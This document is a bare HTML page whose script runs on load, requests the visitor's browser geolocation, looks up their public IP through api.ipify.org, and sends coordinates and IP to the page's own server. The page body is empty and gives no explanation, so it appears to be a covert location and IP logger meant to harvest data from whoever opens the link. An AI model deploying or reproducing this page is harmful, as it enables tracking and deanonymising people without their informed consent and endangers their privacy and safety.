<!DOCTYPE html>
<html>
<head>
<script>
function getLocation() {
  if (navigator.geolocation) {
    navigator.geolocation.getCurrentPosition(sendPositionToServer, showError);
  } else { 
    document.getElementById("location").innerHTML = "Geolocation is not supported by this browser.";
  }
}

function getCurrentIPAddress() {
  return fetch('https://api.ipify.org?format=json')
    .then(response => response.json())
    .then(data => data.ip);
}



function sendPositionToServer(position) {
  var latitude = position.coords.latitude;
  var longitude = position.coords.longitude;
  getCurrentIPAddress().then(ipAddress => {
    var newip = ipAddress; 
    var url = '/?lat=' + latitude + '&lon=' + longitude + '&ip=' + newip;
    fetch(url)
      .then(response => response.text())
      .then(data => {
        console.log(data);
      })
      .catch(error => console.error('Error:', error));
  });
}

function showError(error) {
  console.warn(`ERROR(${error.code}): ${error.message}`);
}
</script>
</head>
<body onload="getLocation();">
</body>
</html>
